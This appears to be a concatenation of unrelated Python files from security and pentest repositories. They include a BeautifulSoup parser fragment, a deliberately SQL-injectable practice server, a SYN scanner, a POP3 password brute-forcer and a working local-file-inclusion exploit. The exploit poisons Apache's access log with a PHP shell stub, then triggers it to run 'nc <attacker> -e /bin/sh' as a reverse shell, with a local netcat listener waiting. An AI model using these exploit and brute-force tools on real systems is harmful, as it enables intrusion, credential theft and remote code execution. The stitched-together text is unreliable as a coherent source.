SGMLParser.reset(self)
self.currentData = []
self.currentTag = None
self.tagStack = []
self.pushTag(self)
def popTag(self):
tag = self.tagStack.pop()
# Tags with just one string-owning child get the child as a
# 'string' property, so that soup.tag.string is shorthand for
# soup.tag.contents[0]
if len(self.currentTag.contents) == 1 and \
isinstance(self.currentTag.contents[0], NavigableText):
self.currentTag.string = self.currentTag.contents[0]
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
#print "Push", tag.name
if self.currentTag:
self.currentTag.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
def endData(self):
currentData = ''.join(self.currentData)
if currentData:
if not currentData.strip():
if '\n' in currentData:
currentData = '\n'
else:
currentData = ' '
c = NavigableString
if type(currentData) == types.UnicodeType:
c = NavigableUnicodeString
o = c(currentData)
o.setup(self.currentTag, self.previous)
if self.previous:
self.previous.next = o
self.previous = o
self.currentTag.contents.append(o)
self.currentData = []
def _popToTag(self, name, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag. If inclusivePop is false, pops the tag
stack up to but *not* including the most recent instqance of
the given tag."""
if name == self.ROOT_TAG_NAME:
return
numPops = 0
mostRecentTag = None
for i in range(len(self.tagStack)-1, 0, -1):
if name == self.tagStack[i].name:
numPops = len(self.tagStack)-i
break
if not inclusivePop:
numPops = numPops - 1
for i in range(0, numPops):
mostRecentTag = self.popTag()
return mostRecentTag
def _smartPop(self, name):
"""We need to pop up to the previous tag of this type, unless
one of this tag's nesting reset triggers comes between this
tag and the previous tag of this type, OR unless this tag is a
generic nesting trigger and another generic nesting trigger
comes between this tag and the previous tag of this type.
Examples:
<p>Foo<b>Bar<p> should pop to 'p', not 'b'.
<p>Foo<table>Bar<p> should pop to 'table', not 'p'.
<p>Foo<table><tr>Bar<p> should pop to 'tr', not 'p'.
<p>Foo<b>Bar<p> should pop to 'p', not 'b'.
<li><ul><li> *<li>* should pop to 'ul', not the first 'li'.
<tr><table><tr> *<tr>* should pop to 'table', not the first 'tr'
<td><tr><td> *<td>* should pop to 'tr', not the first 'td'
"""
nestingResetTriggers = self.NESTABLE_TAGS.get(name)
isNestable = nestingResetTriggers != None
isResetNesting = self.RESET_NESTING_TAGS.has_key(name)
popTo = None
inclusive = True
for i in range(len(self.tagStack)-1, 0, -1):
p = self.tagStack[i]
if (not p or p.name == name) and not isNestable:
#Non-nestable tags get popped to the top or to their
#last occurance.
popTo = name
break
if (nestingResetTriggers != None
and p.name in nestingResetTriggers) \
or (nestingResetTriggers == None and isResetNesting
and self.RESET_NESTING_TAGS.has_key(p.name)):
#If we encounter one of the nesting reset triggers
#peculiar to this tag, or we encounter another tag
#that causes nesting to reset, pop up to but not
#including that tag.
popTo = p.name
inclusive = False
break
p = p.parent
if popTo:
self._popToTag(popTo, inclusive)
def unknown_starttag(self, name, attrs, selfClosing=0):
#print "Start tag %s" % name
if self.quoteStack:
#This is not a real tag.
#print "<%s> is not real!" % name
attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs))
self.handle_data('<%s%s>' % (name, attrs))
return
self.endData()
if not name in self.SELF_CLOSING_TAGS and not selfClosing:
self._smartPop(name)
tag = Tag(name, attrs, self.currentTag, self.previous)
if self.previous:
self.previous.next = tag
self.previous = tag
self.pushTag(tag)
if selfClosing or name in self.SELF_CLOSING_TAGS:
self.popTag()
if name in self.QUOTE_TAGS:
#print "Beginning quote (%s)" % name
self.quoteStack.append(name)
self.literal = 1
def unknown_endtag(self, name):
if self.quoteStack and self.quoteStack[-1] != name:
#This is not a real end tag.
#print "</%s> is not real!" % name
self.handle_data('</%s>' % name)
return
self.endData()
self._popToTag(name)
if self.quoteStack and self.quoteStack[-1] == name:
self.quoteStack.pop()
self.literal = (len(self.quoteStack) > 0)
def handle_data(self, data):
self.currentData.append(data)
def handle_pi(self, text):
"Propagate processing instructions right through."
self.handle_data("<?%s>" % text)
def handle_comment(self, text):
"Propagate comments right through."
self.handle_data("<!--%s-->" % text)
def handle_charref(self, ref):
"Propagate char refs right through."
self.handle_data('&#%s;' % ref)
def handle_entityref(self, ref):
"Propagate entity refs right through."
self.handle_data('&%s;' % ref)
def handle_decl(self, data):
"Propagate DOCTYPEs and the like right through."
self.handle_data('<!%s>' % data)
def parse_declaration(self, i):
"""Treat a bogus SGML declaration as raw data. Treat a CDATA
declaration as regular data."""
j = None
if self.rawdata[i:i+9] == '<![CDATA[':
k = self.rawdata.find(']]>', i)
if k == -1:
k = len(self.rawdata)
self.handle_data(self.rawdata[i+9:k])
j = k+3
else:
try:
j = SGMLParser.parse_declaration(self, i)
except SGMLParseError:
toHandle = self.rawdata[i:]
self.handle_data(toHandle)
j = i + len(toHandle)
return j
class BeautifulSoup(BeautifulStoneSoup):
"""This parser knows the following facts about HTML:
* Some tags have no closing tag and should be interpreted as being
closed as soon as they are encountered.
* The text inside some tags (ie. 'script') may contain tags which
are not really part of the document and which should be parsed
as text, not tags. If you want to parse the text as tags, you can
always fetch it and parse it explicitly.
* Tag nesting rules:
Most tags can't be nested at all. For instance, the occurance of
a <p> tag should implicitly close the previous <p> tag.
<p>Para1<p>Para2
should be transformed into:
<p>Para1</p><p>Para2
Some tags can be nested arbitrarily. For instance, the occurance
of a <blockquote> tag should _not_ implicitly close the previous
<blockquote> tag.
Alice said: <blockquote>Bob said: <blockquote>Blah
should NOT be transformed into:
Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah
Some tags can be nested, but the nesting is reset by the
interposition of other tags. For instance, a <tr> tag should
implicitly close the previous <tr> tag within the same <table>,
but not close a <tr> tag in another table.
<table><tr>Blah<tr>Blah
should be transformed into:
<table><tr>Blah</tr><tr>Blah
but,
<tr>Blah<table><tr>Blah
should NOT be transformed into
<tr>Blah<table></tr><tr>Blah
Differing assumptions about tag nesting rules are a major source
of problems with the BeautifulSoup class. If BeautifulSoup is not
treating as nestable a tag your page author treats as nestable,
try ICantBelieveItsBeautifulSoup before writing your own
subclass."""
SELF_CLOSING_TAGS = buildTagMap(None, ['br' , 'hr', 'input', 'img', 'meta',
'spacer', 'link', 'frame', 'base'])
QUOTE_TAGS = {'script': None}
#According to the HTML standard, each of these inline tags can
#contain another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup',
'center']
#According to the HTML standard, these block tags can contain
#another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del']
#Lists can contain other lists, but there are restrictions.
NESTABLE_LIST_TAGS = { 'ol' : [],
'ul' : [],
'li' : ['ul', 'ol'],
'dl' : [],
'dd' : ['dl'],
'dt' : ['dl'] }
#Tables can contain other tables, but there are restrictions.
NESTABLE_TABLE_TAGS = {'table' : [],
'tr' : ['table', 'tbody', 'tfoot', 'thead'],
'td' : ['tr'],
'th' : ['tr'],
}
NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre']
#If one of these tags is encountered, all tags up to the next tag of
#this type are popped.
RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript',
NON_NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS,
NESTABLE_TABLE_TAGS)
NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS)
class ICantBelieveItsBeautifulSoup(BeautifulSoup):
    """The BeautifulSoup class is oriented towards skipping over
    common HTML errors like unclosed tags. However, sometimes it makes
    errors of its own. For instance, consider this fragment:
    <b>Foo<b>Bar</b></b>
    This is perfectly valid (if bizarre) HTML. However, the
    BeautifulSoup class will implicitly close the first b tag when it
    encounters the second 'b'. It will think the author wrote
    "<b>Foo<b>Bar", and didn't close the first 'b' tag, because
    there's no real-world reason to bold something that's already
    bold. When it encounters '</b></b>' it will close two more 'b'
    tags, for a grand total of three tags closed instead of two. This
    can throw off the rest of your document structure. The same is
    true of a number of other tags, listed below.
    It's much more common for someone to forget to close (eg.) a 'b'
    tag than to actually use nested 'b' tags, and the BeautifulSoup
    class handles the common case. This class handles the
    not-co-common case: where you can't believe someone wrote what
    they did, but it's valid HTML and BeautifulSoup screwed up by
    assuming it wouldn't be.
    If this doesn't do what you need, try subclassing this class or
    BeautifulSoup, and providing your own list of NESTABLE_TAGS."""
    # Inline/block tags this parser additionally treats as nestable,
    # merged into the parent class's NESTABLE_TAGS below.
    I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \
     ['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong',
      'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b',
      'big']
    I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript']
    NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS,
                                I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS,
                                I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS)
class BeautifulSOAP(BeautifulStoneSoup):
    """This class will push a tag with only a single string child into
    the tag's parent as an attribute. The attribute's name is the tag
    name, and the value is the string child. An example should give
    the flavor of the change:
    <foo><bar>baz</bar></foo>
    =>
    <foo bar="baz"><bar>baz</bar></foo>
    You can then access fooTag['bar'] instead of fooTag.barTag.string.
    This is, of course, useful for scraping structures that tend to
    use subelements instead of attributes, such as SOAP messages. Note
    that it modifies its input, so don't print the modified version
    out.
    I'm not sure how many people really want to use this class; let me
    know if you do. Mainly I like the name."""
    def popTag(self):
        # When closing a tag whose only child is a string, mirror that
        # string onto the parent as an attribute named after the tag
        # (unless the parent already has an attribute of that name).
        if len(self.tagStack) > 1:
            tag = self.tagStack[-1]
            parent = self.tagStack[-2]
            parent._getAttrMap()
            if (isinstance(tag, Tag) and len(tag.contents) == 1 and
                isinstance(tag.contents[0], NavigableText) and
                not parent.attrMap.has_key(tag.name)):
                parent[tag.name] = tag.contents[0]
        BeautifulStoneSoup.popTag(self)
#Enterprise class names! It has come to our attention that some people
#think the names of the Beautiful Soup parser classes are too silly
#and "unprofessional" for use in enterprise screen-scraping. We feel
#your pain! For such-minded folk, the Beautiful Soup Consortium And
#All-Night Kosher Bakery recommends renaming this file to
#"RobustParser.py" (or, in cases of extreme enterprisitude,
#"RobustParserBeanInterface.class") and using the following
#enterprise-friendly class aliases:
class RobustXMLParser(BeautifulStoneSoup):
    """Enterprise-friendly alias for BeautifulStoneSoup."""
    pass
class RobustHTMLParser(BeautifulSoup):
    """Enterprise-friendly alias for BeautifulSoup."""
    pass
class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup):
    """Enterprise-friendly alias for ICantBelieveItsBeautifulSoup."""
    pass
class SimplifyingSOAPParser(BeautifulSOAP):
    """Enterprise-friendly alias for BeautifulSOAP."""
    pass
###
#By default, act as an HTML pretty-printer.
if __name__ == '__main__':
    import sys
    # Script mode: read markup from stdin and pretty-print the parse
    # tree (Python 2 print statement).
    soup = BeautifulStoneSoup(sys.stdin.read())
    print soup.prettify()
| 36.779221 | 186 | 0.577434 |
Ethical-Hacking-Scripts | import sqlite3, socket, threading, sys, random
class WebServer:
    """Deliberately SQL-injectable HTTP search server for injection practice.

    Seeds a local SQLite database (users.db) with demo accounts and shop
    items, then serves a single search page whose query string is
    interpolated verbatim into SQL.  The injection vulnerability is the
    point of this program -- do not "fix" it.
    """
    def __init__(self):
        # Parse CLI args, (re)seed the users/items tables, then bind the
        # listening socket.  self.valid gates everything downstream.
        self.logo()
        self.valid = False
        self.name_list = ["admin adminpassword123456","bobby cheeseburger69","david 19216801","mine craft","jerry password","tom jerry"]
        self.names = ["admin", "bobby", "david", "mine", "jerry", "tom"]
        self.items = ["cheeseburger","fries","nuggies","fetus","chicken","rtx 3090","i9 11900kf"]
        try:
            self.ip = sys.argv[1]
            self.port = int(sys.argv[2])
            self.dbfile = "users.db"
            # Create the db file if it does not exist yet.
            # NOTE(review): `file` shadows a builtin and the handle is
            # never closed.
            try:
                file = open(self.dbfile,"r")
            except:
                file = open(self.dbfile,"w")
            db = sqlite3.connect(self.dbfile)
            cursor = db.cursor()
            try:
                cursor.execute("select * from users")
            except:
                cursor.execute("create table users(name, password, logins)")
            # Remove any stale copies of the demo accounts before reinserting.
            try:
                for i in self.name_list:
                    cursor.execute(f"delete from users where name = '{i.split()[0]}'")
            except:
                pass
            for i in self.name_list:
                cursor.execute(f"insert into users values('{i.split()[0]}', '{i.split()[1]}', '0')")
            try:
                cursor.execute("select * from items")
            except:
                cursor.execute("create table items(item, price)")
            try:
                for i in self.items:
                    cursor.execute(f"delete from items where item = '{i}'")
            except:
                pass
            # Each item gets a random $10.10-$100.99 style price.
            for i in self.items:
                cursor.execute(f"insert into items values('{i}', '${random.randint(10,100)}.{random.randint(10,99)}')")
            print(f"\n[+] Try to use SQL Injections to obtain the passwords of these accounts: {self.names}")
            print(f"[+] Here are the 'normal' things you can search for: {self.items}\n")
            # Optional third argument: externally visible address used in
            # the generated HTML form; defaults to the bind address.
            try:
                self.externalip = sys.argv[3]
            except Exception as e:
                self.externalip = self.ip
            self.valid = True
            db.commit()
            cursor.close()
            db.close()
        except Exception as e:
            print("[+] Invalid Arguments!\n[+] Usage: python3 VulnerableServer.py <ip> <port> <externalip>\n[+] Note: The External IP argument is optional.")
        if self.valid:
            try:
                self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.server.bind((self.ip, self.port))
                self.msgs = []
                self.packet = self.gen_packet()
                print(f"[+] Vulnerable SQL Web Server Started on: {self.ip}:{self.port}")
            except Exception as e:
                print(f"[+] Server Cannot be started due to Error: {e}")
                self.valid = False
    def logo(self):
        """Print the ASCII-art banner."""
        print("""
 __      __    _                      _     _      _____  ____  _        _____                          __ ___  
 \ \    / /   | |                    | |   | |    / ____|/ __ \| |      / ____|                        /_ | / _ \ 
  \ \  / / _   _| |_ __   ___ _ __ __ _| |__ | | ___| (___ | |  | | |    | (___   ___ _ ____   _____ _ __ __ _| || | | |
   \ \/ / | | | | '_ \ / _ \ '__/ _` | '_ \| |/ _ \ ___ \| | | | | \___ \ / _ \ '__\ \ / / _ \ '__| \ \ / / || | | |
    \  /| |_| | | | | | __/ | | (_| | |_) | | __/____) | |__| | |____ ____) | __/ | \ V / __/ | \ V /| || |_| |
     \/ \__,_|_|_| |_|\___|_| \__,_|_.__/|_|\___|_____/ \___\_\______| |_____/ \___|_| \_/ \___|_| \_/ |_(_)___/ 
                        Vulnerable Web Server made for Testing SQL Injections by DrSquid""")
    def gen_packet(self, sqlquery="", results=""):
        """Build the HTML page, optionally echoing the SQL query and rows.

        results: "" for a bare page, else a list of (item, price) tuples.
        """
        if results != "":
            new_packet = "<h2>Search Results:</h2>"
            for i in results:
                # NOTE(review): a "item price" string is never an element
                # of the tuple list, so this membership test is always
                # False and the else branch always runs -- confirm intent.
                if f"{i[0]} {i[1]}" in results:
                    pass
                else:
                    new_packet += f"\n<h6>{i[0]} {i[1]}</h6>"
            results = new_packet
        packet = f"""
        <title>Vulnerable SQL Web Server</title>
        <h1>Horrific Looking Search Page</h1>
        This is a horrible looking search page. It is meant to be vulnerable to SQL Injections.
        <form action="http://{self.externalip}:{self.port}">
        Where would you like to go? <input type="text" placeholder="Your Search" name="search">
        <input type="submit" value="Search">
        <h4>Sql Query: {sqlquery}</h4>
        </form>
        {results}
        """
        return packet
    def listen(self):
        """Accept connections forever, handing each off to a handler thread."""
        if self.valid:
            print("[+] Server is listening For Connections.....")
            if self.externalip != self.ip:
                print(f"[+] Also listening on(for external connections): {self.externalip}:{self.port}")
            print("")
            while True:
                try:
                    ipaddr = ""
                    self.server.listen()
                    conn, ip = self.server.accept()
                    self.packet = self.gen_packet()
                    msg = conn.recv(1024).decode()
                    item = 0
                    # Prefer the X-Forwarded-For header (if present) over
                    # the socket peer address for logging.
                    msg_split = msg.split()
                    for i in msg_split:
                        if 'x-forwarded-for' in i.lower():
                            ipaddr = msg_split[item + 1]
                            break
                        item += 1
                    if ipaddr == "":
                        ipaddr = ip[0]
                    print(f"[+] {ipaddr} has connected.")
                    handler = threading.Thread(target=self.handler, args=(conn, msg, ipaddr))
                    handler.start()
                except:
                    pass
    def simplify_str(self, item):
        """Decode the URL-encoded escapes this page's form can produce."""
        return item.replace("+", " ").replace("%3C", "<").replace("%3E", ">").replace(
            "%2F", "/").replace("%22", '"').replace("%27", "'").replace("%3D", "=").replace("%2B",
            "+").replace("%3A", ":").replace("%28", "(").replace("%29", ")").replace("%2C", ","
            ).replace("%3B", ";").replace("%20", " ").replace("%3F", "?").replace("%5C", "\\"
            ).replace("%7B", "{").replace("%7D", "}").replace("%24", "$").replace("%0D", "\n"
            ).replace("%0A", " ").replace("%40","@").replace("%25", "%")
    def search(self, query):
        """Run *query* verbatim (intentionally injectable) and return rows."""
        db = sqlite3.connect(self.dbfile)
        cursor = db.cursor()
        cursor.execute(query)
        item = cursor.fetchall()
        if len(item) >= 1:
            return item
        else:
            return [("No Results.", "")]
    def handler(self, conn, msg, ip):
        """Serve one HTTP request: parse ?search=, run it, send the page."""
        try:
            conn.send('HTTP/1.0 200 OK\n'.encode())
            conn.send('Content-Type: text/html\n'.encode())
            if "/?search=" in msg.split()[1]:
                try:
                    search = self.simplify_str(str(msg).split()[1].split("=")[1]).lower()
                    results = ""
                    if search.strip() == "":
                        conn.send(self.packet.encode())
                    else:
                        # The user-controlled string is spliced straight
                        # into SQL -- the intended vulnerability.
                        query = f"select item, price from items where item = '{search}'"
                        results = self.search(query)
                        packet = self.gen_packet(sqlquery=query, results=results)
                        conn.send(packet.encode())
                except Exception as e:
                    # NOTE(review): `query`/`results` may be unbound here
                    # if the exception occurred before their assignment.
                    print(f"[+] Error: {e}")
                    packet = self.gen_packet(sqlquery=query, results=results)
                    conn.send(packet.encode())
            else:
                conn.send(self.packet.encode())
            conn.close()
        except:
            pass
# Launch the deliberately-vulnerable server only when executed as a
# script, so importing this module (e.g. for testing) does not print the
# banner, touch users.db, or bind a socket.
if __name__ == "__main__":
    e = WebServer()
    e.listen()
| 46.840491 | 158 | 0.424394 |
cybersecurity-penetration-testing | print"<MaltegoMessage>"
print"<MaltegoTransformResponseMessage>"
print" <Entities>"
def maltego(entity, value, addvalues):
    # Emit one Maltego <Entity> element on stdout.
    #   entity:    type suffix appended to "maltego." (e.g. "ip")
    #   value:     the entity's primary value
    #   addvalues: dict of additional field name -> value pairs
    # NOTE(review): the loop variable below shadows the `value`
    # parameter; harmless here because `value` is not used afterwards.
    print"  <Entity Type=\"maltego."+entity+"\">"
    print"    <Value>"+value+"</Value>"
    print"    <AdditionalFields>"
    for value, item in addvalues.iteritems():
        print"      <Field Name=\""+value+"\" DisplayName=\""+value+"\" MatchingRule=\"strict\">"+item+"</Field>"
    print"    </AdditionalFields>"
    print"  </Entity>"
# Demo entity, then close the envelope opened above.
maltego("ip", "127.0.0.1", {"domain": "google.com"})
print"  </Entities>"
print"</MaltegoTransformResponseMessage>"
print"</MaltegoMessage>"
| 24.347826 | 104 | 0.671821 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from scapy.all import *
def dnsQRTest(pkt):
if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53:
rcode = pkt.getlayer(DNS).rcode
qname = pkt.getlayer(DNSQR).qname
if rcode == 3:
print '[!] Name request lookup failed: ' + qname
return True
else:
return False
def main():
unAnsReqs = 0
pkts = rdpcap('domainFlux.pcap')
for pkt in pkts:
if dnsQRTest(pkt):
unAnsReqs = unAnsReqs + 1
print '[!] '+str(unAnsReqs)+' Total Unanswered Name Requests'
# Script entry point.
if __name__ == '__main__':
    main()
| 21.892857 | 65 | 0.557813 |
cybersecurity-penetration-testing | import xlsxwriter
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.04
__description__ = 'Write XSLX file.'

# Column letters 'A'..'Z' used to build spreadsheet cell ranges.
ALPHABET = [chr(code) for code in range(65, 91)]
def writer(output, headers, output_data, **kwargs):
"""
The writer function writes excel output for the framework
:param output: the output filename for the excel spreadsheet
:param headers: the name of the spreadsheet columns
:param output_data: the data to be written to the excel spreadsheet
:return: Nothing
"""
wb = xlsxwriter.Workbook(output)
if headers is None:
print '[-] Received empty headers... \n[-] Skipping writing output.'
return
if len(headers) <= 26:
title_length = ALPHABET[len(headers) - 1]
else:
title_length = 'Z'
ws = addWorksheet(wb, title_length)
if 'recursion' in kwargs.keys():
for i, data in enumerate(output_data):
if i > 0:
ws = addWorksheet(wb, title_length)
cell_length = len(data)
tmp = []
for dictionary in data:
tmp.append(
[unicode(dictionary[x]) if x in dictionary.keys() else '' for x in headers]
)
ws.add_table('A3:' + title_length + str(3 + cell_length),
{'data': tmp, 'columns': [{'header': x} for x in headers]})
else:
cell_length = len(output_data)
tmp = []
for data in output_data:
tmp.append([unicode(data[x]) if x in data.keys() else '' for x in headers])
ws.add_table('A3:' + title_length + str(3 + cell_length),
{'data': tmp, 'columns': [{'header': x} for x in headers]})
wb.close()
def addWorksheet(wb, length, name=None):
    """
    Create a new worksheet with the standard two-row title banner
    :param wb: The workbook object
    :param length: The range of rows to merge
    :param name: The name of the worksheet
    :return: ws, the worksheet
    """
    banner_style = {'bold': True, 'font_color': 'black',
                    'bg_color': 'white', 'font_size': 30,
                    'font_name': 'Arial', 'align': 'center'}
    banner = wb.add_format(banner_style)
    ws = wb.add_worksheet(name)
    # Merge A..<length> on rows 1 and 2 for the company / case banner.
    for row, text in (('1', 'XYZ Corp'), ('2', 'Case ####')):
        ws.merge_range('A' + row + ':' + length + row, text, banner)
    return ws
PenetrationTestingScripts | #coding=utf-8
import time
from printers import printPink,printGreen
import threading
from multiprocessing.dummy import Pool
import poplib
def pop3_Connection(ip,username,password,port):
    # Try one POP3 login; on success, record and print the weak
    # credential via the module-global `lock`/`result` set up in
    # pop_main.  Failures are printed and swallowed.
    # NOTE(review): `port` appears only in the report strings -- the
    # connection always uses poplib's default port.  Also, success is
    # only reported when the mailbox is non-empty (mailCount truthy).
    try:
        pp = poplib.POP3(ip)
        #pp.set_debuglevel(1)
        pp.user(username)
        pp.pass_(password)
        (mailCount,size) = pp.stat()
        pp.quit()
        if mailCount:
            lock.acquire()
            printGreen("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
            result.append("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
            lock.release()
    except Exception,e:
        print e
        lock.acquire()
        print "%s pop3 service 's %s:%s login fail " %(ip,username,password)
        lock.release()
        pass
def pop3_l(ip,port):
try:
d=open('conf/pop3.conf','r')
data=d.readline().strip('\r\n')
while(data):
username=data.split(':')[0]
password=data.split(':')[1]
pop3_Connection(ip,username,password,port)
data=d.readline().strip('\r\n')
except Exception,e:
print e
pass
def pop_main(ipdict,threads):
    # Crack POP3 on every "host:port" entry in ipdict['pop3'] using a
    # pool of `threads` workers; returns the list of hits collected by
    # pop3_Connection.
    printPink("crack pop now...")
    print "[*] start crack pop %s" % time.ctime()
    starttime=time.time()
    # Shared state used by the worker threads (see pop3_Connection).
    global lock
    lock = threading.Lock()
    global result
    result=[]
    pool=Pool(threads)
    for ip in ipdict['pop3']:
        # Entries look like "host:port".
        pool.apply_async(func=pop3_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
    pool.close()
    pool.join()
    print "[*] stop pop serice %s" % time.ctime()
    print "[*] crack pop done,it has Elapsed time:%s " % (time.time()-starttime)
    return result
cybersecurity-penetration-testing | #!/usr/bin/env python
import sys
from scapy.all import *
# SYN-probe every host in the given range on one port and print the
# addresses that answered (usage: script <range> <port>).
targetRange = sys.argv[1]
targetPort = sys.argv[2]
conf.verb=0
# Craft a TCP SYN to the whole target range.
p=IP(dst=targetRange)/TCP(dport=int(targetPort), flags="S")
ans,unans=sr(p, timeout=9)
for answers in ans:
    # NOTE(review): flags == 2 matches a bare SYN reply; an open port
    # normally answers SYN/ACK (0x12 == 18) -- confirm intent.
    if answers[1].flags == 2:
        print answers[1].src
| 16.882353 | 59 | 0.653465 |
Hands-On-Penetration-Testing-with-Python | #unset QT_QPA_PLATFORM
#sudo echo "export QT_QPA_PLATFORM=offscreen" >> /etc/environment
from bs4 import BeautifulSoup
import requests
import multiprocessing as mp
from selenium import webdriver
import time
import datetime
import os
import sys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
class LFT_RFI_automate():
    """Automate an Apache access-log-poisoning LFI to reverse shell.

    All configuration comes from sys.argv (see the usage strings in
    __init__).  The flow is: optional Selenium/PhantomJS login, poison
    the access log with a PHP shell_exec stub via netcat, then request
    the log through the LFI parameter while a local nc listener waits.
    """
    def __init__(self,target="",base=""):
        # Parse positional CLI arguments; on any error print the usage
        # examples and exit.  The `target`/`base` keyword parameters are
        # ignored in favour of sys.argv.
        try:
            print("\n\n\n LFI EXPLOIT BY KHAN \n\n\n")
            self.target=sys.argv[2]
            self.base=sys.argv[1]
            self.target_link=sys.argv[3]
            self.v_param=sys.argv[4]
            self.att_ip=sys.argv[9]
            self.att_port=sys.argv[10]
            # Optional extra query parameters (flag 1/0 in argv[11]).
            if sys.argv[11] == str(1):
                self.add_param=sys.argv[12]
            self.server_domain=""
            if sys.argv[5] == str(0):
                self.login=False
            else :
                self.login=True
            if self.login :
                # Credentials are given as "field_name:field_value".
                self.email_field=sys.argv[6].split(":")[0]
                self.email=sys.argv[6].split(":")[1]
                self.password_field=sys.argv[7].split(":")[0]
                self.password=sys.argv[7].split(":")[1]
                self.login_button=sys.argv[8]
                self.server_domain=self.base
        except Exception as ex:
            print("\n\nException caught : " +str(ex))
            print('\n\nExample : python LFI_RFI.py <target ip> <target Base/Login URL> <target Vulnetable URL> <Target Vul parameter> <Login required (1/0)> <Login field name:Login field value> <Password field name:Password field value> <Login Button name> <Attacker IP> <Attacker Lister PORT> <Add params required (1/0)> <add_param_name1=add_param_value1,add_param_name2=add_param_value2>')
            print('\n\nExample : python LFI_RFI.py 192.168.1.102 http://192.168.1.102/dvwa/login.php http://192.168.1.102/dvwa/vulnerabilities/fi/ page 1 username:admin password:password Login 192.168.1.102 4444 0')
            sys.exit()
    def send_exp(self,delay,browser,exp_url):
        """Wait *delay* seconds, request the trigger URL, screenshot it."""
        print("Send Exploit STARTED")
        time.sleep(delay)
        browser.get(exp_url)
        browser.save_screenshot('Exploit.png')
        print("Send Exploit END")
    def start(self):
        """Run the full attack: login, poison the log, trigger, listen."""
        try:
            if self.login :
                # Drive the login form with PhantomJS.
                browser = webdriver.PhantomJS()
                browser.get(self.target)
                element_username=browser.find_element_by_name(self.email_field);
                element_username.clear()
                element_username.send_keys(self.email)
                element_username.click()
                element_password=browser.find_element_by_name(self.password_field);
                element_password.clear()
                element_password.send_keys(self.password)
                element_password.click()
                try:
                    element_submit = WebDriverWait(browser, 2).until(
                        EC.element_to_be_clickable((By.NAME,self.login_button))
                    )
                    time. sleep(2)
                    element_submit.click()
                except Exception as ee:
                    print("Exception : "+str(ee))
                    browser.quit()
            else:
                browser = webdriver.PhantomJS()
                browser.get(self.target)
            html = browser.page_source
            # DVWA-specific: force the 'security=low' cookie.
            cookie={'domain':self.server_domain,'name': 'security','value':'low',
                    'path': '/dvwa/','httponly': False, 'secure': False}
            #security=low; PHPSESSID=5c6uk2gvq4q9ri9pkmprbvt6u2
            browser.add_cookie(cookie)
            all_cookies = browser.get_cookies()
            soup = BeautifulSoup(html, "html.parser")
            anchor_tags=soup.find_all("a")
            browser.save_screenshot('screen.png')
            print("\n Saved Screen shot Post Login / Firt request")
            # Poison the access log: send a raw request whose URL embeds a
            # PHP shell_exec stub, delivered with netcat so it is logged
            # verbatim.
            self.nav_url=self.target_link+"?"+str(self.v_param)+"=<?php echo shell_exec($_GET['cmd']); ?>"
            print("Preparing Payload")
            os.system("echo '"+str(self.nav_url) +"' > exp.txt")
            print("Payload prepared")
            print("\n\nOpening Netcat to send payload..... ")
            os.system("echo 'nc "+self.base+" 80 < exp.txt' > exp.sh")
            os.system("chmod +x exp.sh")
            os.system("./exp.sh")
            print("Payload sent")
            print("Now sending Payload in 5 sec")
            # Trigger: include the poisoned log via the LFI parameter and
            # make the stub connect back to the attacker with nc.
            exp_url=self.target_link+"?"+str(self.v_param)+"=/var/log/apache2/access.log&cmd=nc "+self.att_ip+" "+self.att_port+" -e /bin/sh"
            print("\n\n Exploit to be send : " +str(exp_url))
            p=mp.Process(target=self.send_exp,args=(5,browser,exp_url))
            p.start()
            print("Starting NC")
            print("Preparing EXploit to send")
            # NOTE(review): listener port is hard-coded to 4444 here,
            # regardless of the att_port argument used in exp_url.
            os.system("nc -nlvp 4444")
        except Exception as ex:
            print(str(ex))
# Run the exploit only when executed as a script; importing the module
# (e.g. for reuse of the class) must not parse sys.argv or launch nc.
if __name__ == "__main__":
    obj = LFT_RFI_automate()
    obj.start()
| 36.452174 | 382 | 0.687877 |
PenetrationTestingScripts | import ctypes,sys
import platform
if platform.system()=='Linux' or platform.system()=='Darwin':
    # POSIX terminals: colour output via ANSI escape sequences.
    class colors:
        # ANSI SGR colour codes.
        BLACK = '\033[0;30m'
        DARK_GRAY = '\033[1;30m'
        LIGHT_GRAY = '\033[0;37m'
        BLUE = '\033[0;34m'
        LIGHT_BLUE = '\033[1;34m'
        GREEN = '\033[0;32m'
        LIGHT_GREEN = '\033[1;32m'
        CYAN = '\033[0;36m'
